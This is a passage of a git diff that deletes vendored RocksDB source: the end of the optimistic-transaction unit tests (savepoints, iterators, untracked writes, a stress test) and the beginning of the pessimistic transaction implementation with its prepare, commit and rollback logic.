-  txn2->Put("1", "4");
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  txn1->Put("1", "5");
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn2->Put("1", "6");
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  txn1->Put("1", "5");
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn2->SetSnapshot();
-  txn2->Put("1", "6");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-  txn2 = txn_db->BeginTransaction(write_options);
-
-  txn1->Put("1", "7");
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn2->Put("1", "8");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "8");
-}
-
-TEST_F(OptimisticTransactionTest, UntrackedWrites) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  // Verify transaction rollback works for untracked keys.
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  txn->PutUntracked("untracked", "0");
-  txn->Rollback();
-  s = db->Get(read_options, "untracked", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-  txn = txn_db->BeginTransaction(write_options);
-
-  txn->Put("tracked", "1");
-  txn->PutUntracked("untracked", "1");
-  txn->MergeUntracked("untracked", "2");
-  txn->DeleteUntracked("untracked");
-
-  // Write to the untracked key outside of the transaction and verify
-  // it doesn't prevent the transaction from committing.
-  s = db->Put(write_options, "untracked", "x");
-  ASSERT_OK(s);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "untracked", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-  txn = txn_db->BeginTransaction(write_options);
-
-  txn->Put("tracked", "10");
-  txn->PutUntracked("untracked", "A");
-
-  // Write to tracked key outside of the transaction and verify that the
-  // untracked keys are not written when the commit fails.
-  s = db->Delete(write_options, "tracked");
-
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  s = db->Get(read_options, "untracked", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, IteratorTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Write some keys to the db
-  s = db->Put(write_options, "A", "a");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "G", "g");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "F", "f");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "C", "c");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "D", "d");
-  ASSERT_OK(s);
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  // Write some keys in a txn
-  s = txn->Put("B", "b");
-  ASSERT_OK(s);
-
-  s = txn->Put("H", "h");
-  ASSERT_OK(s);
-
-  s = txn->Delete("D");
-  ASSERT_OK(s);
-
-  s = txn->Put("E", "e");
-  ASSERT_OK(s);
-
-  txn->SetSnapshot();
-  const Snapshot* snapshot = txn->GetSnapshot();
-
-  // Write some keys to the db after the snapshot
-  s = db->Put(write_options, "BB", "xx");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "C", "xx");
-  ASSERT_OK(s);
-
-  read_options.snapshot = snapshot;
-  Iterator* iter = txn->GetIterator(read_options);
-  ASSERT_OK(iter->status());
-  iter->SeekToFirst();
-
-  // Read all keys via iter and lock them all
-  std::string results[] = {"a", "b", "c", "e", "f", "g", "h"};
-  for (int i = 0; i < 7; i++) {
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(results[i], iter->value().ToString());
-
-    s = txn->GetForUpdate(read_options, iter->key(), nullptr);
-    ASSERT_OK(s);
-
-    iter->Next();
-  }
-  ASSERT_FALSE(iter->Valid());
-
-  iter->Seek("G");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("g", iter->value().ToString());
-
-  iter->Prev();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("f", iter->value().ToString());
-
-  iter->Seek("D");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("e", iter->value().ToString());
-
-  iter->Seek("C");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("c", iter->value().ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("e", iter->value().ToString());
-
-  iter->Seek("");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("a", iter->value().ToString());
-
-  iter->Seek("X");
-  ASSERT_OK(iter->status());
-  ASSERT_FALSE(iter->Valid());
-
-  iter->SeekToLast();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("h", iter->value().ToString());
-
-  // key "C" was modified in the db after txn's snapshot.  txn will not commit.
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete iter;
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, SavepointTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-
-  txn->SetSavePoint();  // 1
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to beginning of txn
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("B", "b");
-  ASSERT_OK(s);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  delete txn;
-  txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("B", "bb");
-  ASSERT_OK(s);
-
-  s = txn->Put("C", "c");
-  ASSERT_OK(s);
-
-  txn->SetSavePoint();  // 2
-
-  s = txn->Delete("B");
-  ASSERT_OK(s);
-
-  s = txn->Put("C", "cc");
-  ASSERT_OK(s);
-
-  s = txn->Put("D", "d");
-  ASSERT_OK(s);
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to 2
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("bb", value);
-
-  s = txn->Get(read_options, "C", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c", value);
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("E", "e");
-  ASSERT_OK(s);
-
-  // Rollback to beginning of txn
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  txn->Rollback();
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "E", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("A", "aa");
-  ASSERT_OK(s);
-
-  s = txn->Put("F", "f");
-  ASSERT_OK(s);
-
-  txn->SetSavePoint();  // 3
-  txn->SetSavePoint();  // 4
-
-  s = txn->Put("G", "g");
-  ASSERT_OK(s);
-
-  s = txn->Delete("F");
-  ASSERT_OK(s);
-
-  s = txn->Delete("B");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("aa", value);
-
-  s = txn->Get(read_options, "F", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to 3
-
-  s = txn->Get(read_options, "F", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("f", value);
-
-  s = txn->Get(read_options, "G", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "F", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("f", value);
-
-  s = db->Get(read_options, "G", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("aa", value);
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  s = db->Get(read_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "E", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, UndoGetForUpdateTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "A", "");
-
-  Transaction* txn1 = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn1);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-
-  Transaction* txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 can commit since A isn't conflict checked
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-  txn1->Put("A", "a");
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 cannot commit since A will still be conflict checked
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 cannot commit since A will still be conflict checked
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 can commit since A isn't conflict checked
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 cannot commit since A will still be conflict checked
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 cannot commit since A will still be conflict checked
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  txn1->UndoGetForUpdate("A");
-
-  txn1->RollbackToSavePoint();
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 can commit since A isn't conflict checked
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-}
-
-namespace {
-Status OptimisticTransactionStressTestInserter(OptimisticTransactionDB* db,
-                                               const size_t num_transactions,
-                                               const size_t num_sets,
-                                               const size_t num_keys_per_set) {
-  size_t seed = std::hash<std::thread::id>()(std::this_thread::get_id());
-  Random64 _rand(seed);
-  WriteOptions write_options;
-  ReadOptions read_options;
-  OptimisticTransactionOptions txn_options;
-  txn_options.set_snapshot = true;
-
-  RandomTransactionInserter inserter(&_rand, write_options, read_options,
-                                     num_keys_per_set,
-                                     static_cast<uint16_t>(num_sets));
-
-  for (size_t t = 0; t < num_transactions; t++) {
-    bool success = inserter.OptimisticTransactionDBInsert(db, txn_options);
-    if (!success) {
-      // unexpected failure
-      return inserter.GetLastStatus();
-    }
-  }
-
-  // Make sure at least some of the transactions succeeded.  It's ok if
-  // some failed due to write-conflicts.
-  if (inserter.GetFailureCount() > num_transactions / 2) {
-    return Status::TryAgain("Too many transactions failed! " +
-                            std::to_string(inserter.GetFailureCount()) + " / " +
-                            std::to_string(num_transactions));
-  }
-
-  return Status::OK();
-}
-}  // namespace
-
-TEST_F(OptimisticTransactionTest, OptimisticTransactionStressTest) {
-  const size_t num_threads = 4;
-  const size_t num_transactions_per_thread = 10000;
-  const size_t num_sets = 3;
-  const size_t num_keys_per_set = 100;
-  // Setting the key-space to be 100 keys should cause enough write-conflicts
-  // to make this test interesting.
-
-  std::vector<port::Thread> threads;
-
-  std::function<void()> call_inserter = [&] {
-    ASSERT_OK(OptimisticTransactionStressTestInserter(
-        txn_db, num_transactions_per_thread, num_sets, num_keys_per_set));
-  };
-
-  // Create N threads that use RandomTransactionInserter to write
-  // many transactions.
-  for (uint32_t i = 0; i < num_threads; i++) {
-    threads.emplace_back(call_inserter);
-  }
-
-  // Wait for all threads to run
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  // Verify that data is consistent
-  Status s = RandomTransactionInserter::Verify(db, num_sets);
-  ASSERT_OK(s);
-}
-
-TEST_F(OptimisticTransactionTest, SequenceNumberAfterRecoverTest) {
-  WriteOptions write_options;
-  OptimisticTransactionOptions transaction_options;
-
-  Transaction* transaction(txn_db->BeginTransaction(write_options, transaction_options));
-  Status s = transaction->Put("foo", "val");
-  ASSERT_OK(s);
-  s = transaction->Put("foo2", "val");
-  ASSERT_OK(s);
-  s = transaction->Put("foo3", "val");
-  ASSERT_OK(s);
-  s = transaction->Commit();
-  ASSERT_OK(s);
-  delete transaction;
-
-  Reopen();
-  transaction = txn_db->BeginTransaction(write_options, transaction_options);
-  s = transaction->Put("bar", "val");
-  ASSERT_OK(s);
-  s = transaction->Put("bar2", "val");
-  ASSERT_OK(s);
-  s = transaction->Commit();
-  ASSERT_OK(s);
-
-  delete transaction;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(
-      stderr,
-      "SKIPPED as optimistic_transaction is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.cc b/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.cc
deleted file mode 100644
index 68b8b4f..0000000
--- a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.cc
+++ /dev/null
@@ -1,595 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/pessimistic_transaction.h"
-
-#include <map>
-#include <set>
-#include <string>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "util/cast_util.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "utilities/transactions/pessimistic_transaction_db.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-struct WriteOptions;
-
-std::atomic<TransactionID> PessimisticTransaction::txn_id_counter_(1);
-
-TransactionID PessimisticTransaction::GenTxnID() {
-  return txn_id_counter_.fetch_add(1);
-}
-
-PessimisticTransaction::PessimisticTransaction(
-    TransactionDB* txn_db, const WriteOptions& write_options,
-    const TransactionOptions& txn_options)
-    : TransactionBaseImpl(txn_db->GetRootDB(), write_options),
-      txn_db_impl_(nullptr),
-      expiration_time_(0),
-      txn_id_(0),
-      waiting_cf_id_(0),
-      waiting_key_(nullptr),
-      lock_timeout_(0),
-      deadlock_detect_(false),
-      deadlock_detect_depth_(0) {
-  txn_db_impl_ =
-      static_cast_with_check<PessimisticTransactionDB, TransactionDB>(txn_db);
-  db_impl_ = static_cast_with_check<DBImpl, DB>(db_);
-  Initialize(txn_options);
-}
-
-void PessimisticTransaction::Initialize(const TransactionOptions& txn_options) {
-  txn_id_ = GenTxnID();
-
-  txn_state_ = STARTED;
-
-  deadlock_detect_ = txn_options.deadlock_detect;
-  deadlock_detect_depth_ = txn_options.deadlock_detect_depth;
-  write_batch_.SetMaxBytes(txn_options.max_write_batch_size);
-
-  lock_timeout_ = txn_options.lock_timeout * 1000;
-  if (lock_timeout_ < 0) {
-    // Lock timeout not set, use default
-    lock_timeout_ =
-        txn_db_impl_->GetTxnDBOptions().transaction_lock_timeout * 1000;
-  }
-
-  if (txn_options.expiration >= 0) {
-    expiration_time_ = start_time_ + txn_options.expiration * 1000;
-  } else {
-    expiration_time_ = 0;
-  }
-
-  if (txn_options.set_snapshot) {
-    SetSnapshot();
-  }
-
-  if (expiration_time_ > 0) {
-    txn_db_impl_->InsertExpirableTransaction(txn_id_, this);
-  }
-}
-
-PessimisticTransaction::~PessimisticTransaction() {
-  txn_db_impl_->UnLock(this, &GetTrackedKeys());
-  if (expiration_time_ > 0) {
-    txn_db_impl_->RemoveExpirableTransaction(txn_id_);
-  }
-  if (!name_.empty() && txn_state_ != COMMITED) {
-    txn_db_impl_->UnregisterTransaction(this);
-  }
-}
-
-void PessimisticTransaction::Clear() {
-  txn_db_impl_->UnLock(this, &GetTrackedKeys());
-  TransactionBaseImpl::Clear();
-}
-
-void PessimisticTransaction::Reinitialize(
-    TransactionDB* txn_db, const WriteOptions& write_options,
-    const TransactionOptions& txn_options) {
-  if (!name_.empty() && txn_state_ != COMMITED) {
-    txn_db_impl_->UnregisterTransaction(this);
-  }
-  TransactionBaseImpl::Reinitialize(txn_db->GetRootDB(), write_options);
-  Initialize(txn_options);
-}
-
-bool PessimisticTransaction::IsExpired() const {
-  if (expiration_time_ > 0) {
-    if (db_->GetEnv()->NowMicros() >= expiration_time_) {
-      // Transaction is expired.
-      return true;
-    }
-  }
-
-  return false;
-}
-
-WriteCommittedTxn::WriteCommittedTxn(TransactionDB* txn_db,
-                                     const WriteOptions& write_options,
-                                     const TransactionOptions& txn_options)
-    : PessimisticTransaction(txn_db, write_options, txn_options){};
-
-Status WriteCommittedTxn::CommitBatch(WriteBatch* batch) {
-  TransactionKeyMap keys_to_unlock;
-  Status s = LockBatch(batch, &keys_to_unlock);
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  bool can_commit = false;
-
-  if (IsExpired()) {
-    s = Status::Expired();
-  } else if (expiration_time_ > 0) {
-    TransactionState expected = STARTED;
-    can_commit = std::atomic_compare_exchange_strong(&txn_state_, &expected,
-                                                     AWAITING_COMMIT);
-  } else if (txn_state_ == STARTED) {
-    // lock stealing is not a concern
-    can_commit = true;
-  }
-
-  if (can_commit) {
-    txn_state_.store(AWAITING_COMMIT);
-    s = db_->Write(write_options_, batch);
-    if (s.ok()) {
-      txn_state_.store(COMMITED);
-    }
-  } else if (txn_state_ == LOCKS_STOLEN) {
-    s = Status::Expired();
-  } else {
-    s = Status::InvalidArgument("Transaction is not in state for commit.");
-  }
-
-  txn_db_impl_->UnLock(this, &keys_to_unlock);
-
-  return s;
-}
-
-Status PessimisticTransaction::Prepare() {
-  Status s;
-
-  if (name_.empty()) {
-    return Status::InvalidArgument(
-        "Cannot prepare a transaction that has not been named.");
-  }
-
-  if (IsExpired()) {
-    return Status::Expired();
-  }
-
-  bool can_prepare = false;
-
-  if (expiration_time_ > 0) {
-    // must concern ourselves with expiraton and/or lock stealing
-    // need to compare/exchange bc locks could be stolen under us here
-    TransactionState expected = STARTED;
-    can_prepare = std::atomic_compare_exchange_strong(&txn_state_, &expected,
-                                                      AWAITING_PREPARE);
-  } else if (txn_state_ == STARTED) {
-    // expiration and lock stealing is not possible
-    can_prepare = true;
-  }
-
-  if (can_prepare) {
-    txn_state_.store(AWAITING_PREPARE);
-    // transaction can't expire after preparation
-    expiration_time_ = 0;
-    s = PrepareInternal();
-    if (s.ok()) {
-      assert(log_number_ != 0);
-      dbimpl_->MarkLogAsContainingPrepSection(log_number_);
-      txn_state_.store(PREPARED);
-    }
-  } else if (txn_state_ == LOCKS_STOLEN) {
-    s = Status::Expired();
-  } else if (txn_state_ == PREPARED) {
-    s = Status::InvalidArgument("Transaction has already been prepared.");
-  } else if (txn_state_ == COMMITED) {
-    s = Status::InvalidArgument("Transaction has already been committed.");
-  } else if (txn_state_ == ROLLEDBACK) {
-    s = Status::InvalidArgument("Transaction has already been rolledback.");
-  } else {
-    s = Status::InvalidArgument("Transaction is not in state for commit.");
-  }
-
-  return s;
-}
-
-Status WriteCommittedTxn::PrepareInternal() {
-  WriteOptions write_options = write_options_;
-  write_options.disableWAL = false;
-  WriteBatchInternal::MarkEndPrepare(GetWriteBatch()->GetWriteBatch(), name_);
-  Status s =
-      db_impl_->WriteImpl(write_options, GetWriteBatch()->GetWriteBatch(),
-                          /*callback*/ nullptr, &log_number_, /*log ref*/ 0,
-                          /* disable_memtable*/ true);
-  return s;
-}
-
-Status PessimisticTransaction::Commit() {
-  Status s;
-  bool commit_without_prepare = false;
-  bool commit_prepared = false;
-
-  if (IsExpired()) {
-    return Status::Expired();
-  }
-
-  if (expiration_time_ > 0) {
-    // we must atomicaly compare and exchange the state here because at
-    // this state in the transaction it is possible for another thread
-    // to change our state out from under us in the even that we expire and have
-    // our locks stolen. In this case the only valid state is STARTED because
-    // a state of PREPARED would have a cleared expiration_time_.
-    TransactionState expected = STARTED;
-    commit_without_prepare = std::atomic_compare_exchange_strong(
-        &txn_state_, &expected, AWAITING_COMMIT);
-    TEST_SYNC_POINT("TransactionTest::ExpirableTransactionDataRace:1");
-  } else if (txn_state_ == PREPARED) {
-    // expiration and lock stealing is not a concern
-    commit_prepared = true;
-  } else if (txn_state_ == STARTED) {
-    // expiration and lock stealing is not a concern
-    commit_without_prepare = true;
-    // TODO(myabandeh): what if the user mistakenly forgets prepare? We should
-    // add an option so that the user explictly express the intention of
-    // skipping the prepare phase.
-  }
-
-  if (commit_without_prepare) {
-    assert(!commit_prepared);
-    if (WriteBatchInternal::Count(GetCommitTimeWriteBatch()) > 0) {
-      s = Status::InvalidArgument(
-          "Commit-time batch contains values that will not be committed.");
-    } else {
-      txn_state_.store(AWAITING_COMMIT);
-      s = CommitWithoutPrepareInternal();
-      Clear();
-      if (s.ok()) {
-        txn_state_.store(COMMITED);
-      }
-    }
-  } else if (commit_prepared) {
-    txn_state_.store(AWAITING_COMMIT);
-
-    s = CommitInternal();
-
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(db_impl_->immutable_db_options().info_log,
-                     "Commit write failed");
-      return s;
-    }
-
-    // FindObsoleteFiles must now look to the memtables
-    // to determine what prep logs must be kept around,
-    // not the prep section heap.
-    assert(log_number_ > 0);
-    dbimpl_->MarkLogAsHavingPrepSectionFlushed(log_number_);
-    txn_db_impl_->UnregisterTransaction(this);
-
-    Clear();
-    txn_state_.store(COMMITED);
-  } else if (txn_state_ == LOCKS_STOLEN) {
-    s = Status::Expired();
-  } else if (txn_state_ == COMMITED) {
-    s = Status::InvalidArgument("Transaction has already been committed.");
-  } else if (txn_state_ == ROLLEDBACK) {
-    s = Status::InvalidArgument("Transaction has already been rolledback.");
-  } else {
-    s = Status::InvalidArgument("Transaction is not in state for commit.");
-  }
-
-  return s;
-}
-
-Status WriteCommittedTxn::CommitWithoutPrepareInternal() {
-  Status s = db_->Write(write_options_, GetWriteBatch()->GetWriteBatch());
-  return s;
-}
-
-Status WriteCommittedTxn::CommitInternal() {
-  // We take the commit-time batch and append the Commit marker.
-  // The Memtable will ignore the Commit marker in non-recovery mode
-  WriteBatch* working_batch = GetCommitTimeWriteBatch();
-  WriteBatchInternal::MarkCommit(working_batch, name_);
-
-  // any operations appended to this working_batch will be ignored from WAL
-  working_batch->MarkWalTerminationPoint();
-
-  // insert prepared batch into Memtable only skipping WAL.
-  // Memtable will ignore BeginPrepare/EndPrepare markers
-  // in non recovery mode and simply insert the values
-  WriteBatchInternal::Append(working_batch, GetWriteBatch()->GetWriteBatch());
-
-  auto s = db_impl_->WriteImpl(write_options_, working_batch, nullptr, nullptr,
-                               log_number_);
-  return s;
-}
-
-Status WriteCommittedTxn::Rollback() {
-  Status s;
-  if (txn_state_ == PREPARED) {
-    WriteBatch rollback_marker;
-    WriteBatchInternal::MarkRollback(&rollback_marker, name_);
-    txn_state_.store(AWAITING_ROLLBACK);
-    s = db_impl_->WriteImpl(write_options_, &rollback_marker);
-    if (s.ok()) {
-      // we do not need to keep our prepared section around
-      assert(log_number_ > 0);
-      dbimpl_->MarkLogAsHavingPrepSectionFlushed(log_number_);
-      Clear();
-      txn_state_.store(ROLLEDBACK);
-    }
-  } else if (txn_state_ == STARTED) {
-    // prepare couldn't have taken place
-    Clear();
-  } else if (txn_state_ == COMMITED) {
-    s = Status::InvalidArgument("This transaction has already been committed.");
-  } else {
-    s = Status::InvalidArgument(
-        "Two phase transaction is not in state for rollback.");
-  }
-
-  return s;
-}
-
-Status PessimisticTransaction::RollbackToSavePoint() {
-  if (txn_state_ != STARTED) {
-    return Status::InvalidArgument("Transaction is beyond state for rollback.");
-  }
-
-  // Unlock any keys locked since last transaction
-  const std::unique_ptr<TransactionKeyMap>& keys =
-      GetTrackedKeysSinceSavePoint();
-
-  if (keys) {
-    txn_db_impl_->UnLock(this, keys.get());
-  }
-
-  return TransactionBaseImpl::RollbackToSavePoint();
-}
-
-// Lock all keys in this batch.
-// On success, caller should unlock keys_to_unlock
-Status PessimisticTransaction::LockBatch(WriteBatch* batch,
-                                         TransactionKeyMap* keys_to_unlock) {
-  class Handler : public WriteBatch::Handler {
-   public:
-    // Sorted map of column_family_id to sorted set of keys.
-    // Since LockBatch() always locks keys in sorted order, it cannot deadlock
-    // with itself.  We're not using a comparator here since it doesn't matter
-    // what the sorting is as long as it's consistent.
-    std::map<uint32_t, std::set<std::string>> keys_;
-
-    Handler() {}
-
-    void RecordKey(uint32_t column_family_id, const Slice& key) {
-      std::string key_str = key.ToString();
-
-      auto iter = (keys_)[column_family_id].find(key_str);
-      if (iter == (keys_)[column_family_id].end()) {
-        // key not yet seen, store it.
-        (keys_)[column_family_id].insert({std::move(key_str)});
-      }
-    }
-
